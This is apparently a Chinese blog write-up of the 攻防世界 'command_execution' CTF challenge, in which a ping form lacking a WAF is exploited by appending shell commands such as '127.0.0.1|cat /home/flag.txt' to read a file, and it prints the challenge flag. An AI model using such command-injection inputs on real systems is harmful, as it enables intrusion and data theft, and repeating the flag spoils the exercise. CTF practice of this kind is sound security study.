攻防世界 | command_execution WP

最新推荐文章于 2022-09-18 22:01:11 发布
最新推荐文章于 2022-09-18 22:01:11 发布
阅读量191 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47982238/article/details/108559601
版权

题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。

首先去了解一下waf是个啥——

Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。

 按我现有的知识储备量,先ping一个本地试试,发现可以ping通(如下图)

ping 127.0.0.1

 

可以ping通的话,再试试搜索一下flag字段看看有没有:

127.0.0.1 |find / -name "*.txt"

 

找到flag.txt后,输入一下代码来查看flag.txt中的内容

127.0.0.1|cat /home/flag.txt 

 

成功拿到flag:  cyberpeace{aa82ad143f24e6fc813e6a8823793325}

 

Bravo!!!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初学ctf的题目解析
07-07
ctf的一些方法
攻防世界command_execution(web简单)
my_name_is_sy的博客
05-31 296
在一个没有waf的地方给shell命令的执行权限是真的危险啊。 这个题主要考点为shell命令的拼接。 文章中包含了几种常见的shell命令拼接方法。
xctf攻防世界—Web新手练习区 writeup
Senimo
08-08 5114
xctf攻防世界—Web新手练习区 writeupview_sourceget_postrobotsbackupcookiedisabled_buttonsimple_jsxff_refererweak_authwebshellcommand_executionsimple_php view_source 难度系数: 1.0 题目来源: Cyberpeace-n3k0 题目描述:X老师小宁同学查...
攻防世界WEB部分write up
克格莫
02-10 253
新手入门区域 1.command_execution 小宁了个ping功能,但没有waf,X老师告诉她这是非常危险的,你知道为什么吗。 wp: 输入127.0.0.1;ls,发现可执行后面的ls,故直接用find命令查找:127.0.0.1;find / -name '*flag*' 看到/home/flag.txt ,于是输入:127.0.0.1;cat /home/flag.tx...
攻防世界—Web新手题
Karry_xk的博客
12-22 157
场景:command_execution 难度系数:2.0 题目来源: Cyberpeace-n3k0 题目描述:小宁了个ping功能,但没有waf,X老师告诉她这是非常危险的,你知道为什么吗。 题目场景:http://220.249.52.134:56092 问题描述: 小宁了个ping功能,但没有waf,X老师告诉她这是非常危险的,你知道为什么吗。 解决方案: 先尝试输入本地IP: ping -c 3 127.0.0.1 PING 127.0.0.1 (127.0.0.1) 56(84) b
攻防世界——command_execution
weixin_62281892的博客
09-18 184
可以发现,第一个flag.txt文件应该是的用127.0.0.1&&cat /home/flag.txt查看。首先看题目咱们应该知道这是一道命令执行题。先pingping本地看看。
攻防世界web刷题 新手区 command_execution 详细解!!!超详细
qq_39585393的博客
11-13 3240
command_execution 题目 小宁了个ping功能,但没有waf,X老师告诉她这是非常危险的,你知道为什么吗。 题目分析与解题思路 1.题目提示,了一个ping功能但是没有waf,再加上题目是command——execution(命令执行),推测应该是在ping的过程中夹杂了其他的命令导致文件泄漏。 2.ping哪个地址呢,要读取本地的文件,显然要ping本机的地址选择127.0.0.1 解题: 1.先ping一下127.0.0.1看看返回值 成功返回结果,一共发送了3个包。 2.
攻防世界web新手题解题writeup
devilare的博客
09-09 2465
攻防世界web新手题 1.view_source 题目描述:X老师小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 题目场景: http://220.249.52.133:58537初级题,按下F12查看网页源码得到flag 2.get_post 题目描述:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗? 题目场景: http://220.249.52.133:35963打开场景发现提示在域名栏输入**/?a=1**得到新的提示 这里我们可以用到一个火狐插件Max Ha
攻防世界[刷题笔记]之Web方向(练习区)(后半)
qi_qi14的博客
03-20 5769
网络安全学习攻防世界[刷题笔记]Web方向(新手区)(后半)xff_referer 攻防世界[刷题笔记] Web方向(新手区)(后半) xff_referer 题目来源: Cyberpeace-n3k0 题目描述:X老师告诉小宁其实xff和referer是可以伪造的。 题目附件: 暂无 题解: ...
攻防世界新手题
qq_46151129的博客
10-10 220
Web–command_execution 题目描述:小宁了个ping功能,但没有waf,X老师告诉她这是非常危险的,你知道为什么吗。 打开场景后: 因为是一个执行ping的输入框,访问本地(127.0.0.1) 访问成功后,尝试获取当前目录,使用命令“Is” 访问成功后,寻找txt文件,输入命令“127.0.0.1 &&find / -name “*.txt”。 可以看到里面都flag文件,使用cat抓取文件 就得到了我们的flag。 Web–simple_php 题目描述:小宁听说
攻防世界 WEB 新手练习区 答题(1-12题解)
小哈里的博客
10-23 8899
序 传送门:https://adworld.xctf.org.cn/task/ 1、
PyPI 官网下载 | af_execution_manager-4.0.2-py3-none-any.whl
02-06
资源来自pypi官网,解压后可用。 资源全名:af_execution_manager-4.0.2-py3-none-any.whl
Hardware_Accelerated_Execution_Manager.zip
06-09
用以解决androidatudio虚拟机因未装haxm而无法运行的情况: 将intelhaxm-android文件放入..sdk\extras\intel\Hardware_Accelerated_Execution_Manager文件下,然后手动运行intelhaxm-android文件。
VAL2.rar_Symbolic execution_execution
09-14
C code for Symstra framework , symbolic execution in java
PHP 最大运行时间 max_execution_time修改方法
10-29
有一种简单的方法,就是在脚本中直接修改配置文件
攻防世界 | 幂数加密
weixin_47982238的博客
09-15 2989
先看一下什么是幂数加密 二进制幂数加密法,由于英文字母只有26个字母。只要2的0、1、2、3、4、5次幂就可以表示31个单元。通过用二进制幂数表示字母序号数来加密。 二进制幂数加密法就是应用这个原理,由于英文字母只有26个字母,由公式可知,只要2的0、1、2、3、4、5次幂就可以表示31个单元。通过用二进制幂数表示字母序号数来加密。例如 明文: d o n o t p u l l a l l y o u r e g g s i n o n e b a s k e t 字母序号:4 15 14.
攻防世界 | 不仅仅是Morse
weixin_47982238的博客
09-13 1996
打开附件看一下是下面一串摩斯电码 解个码—— 去网上找了一下,知道是培根密码。然后找到网站工具解码:http://rumkin.com/tools/cipher/baconian.php 把他换成小就好了,拿到flag:cyberpeace{attackanddefenceworldisinteresting} ...
BUUCTF | crypto-password
weixin_47982238的博客
09-02 1184
我觉得我自己真的是天才吧!!!! 首先拿到压缩包解压以后里面的内容如下图: 数了一下key{xxxxxxxxxx}里面一共有是个x,猜想花括号里面应该是十个字符组成的字符串 姓名首字母加生日正好是十个字符,拿去试一下正确,所以flag:flag{zs19900315} ...
WEB | 文件上传漏洞
weixin_47982238的博客
10-13 946
今天在攻防世界做了一道关于文件上传的webCTF题,就想着系统地把文件上传漏洞的知识点整理一下,方便日后查阅。 什么是文件上传? 文件上传包括了上传头像,上传相册,上传附件,添加新闻图片,自定义主题背景,新闻投稿等等,一个很简单的栗子就是微信或者QQ的头像上传功能,或者上传到百度云这种 什么是文件上传漏洞? 文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这
攻防世界command_execution
最新发布
03-16
攻防世界(CTF)是一种针对信息安全专业人员的比赛形式,通常包括对抗性漏洞挖掘、网络攻击和防御、密码学等多种技能的考验。其中之一是command_execution,指的是攻击者利用漏洞在目标系统上执行命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值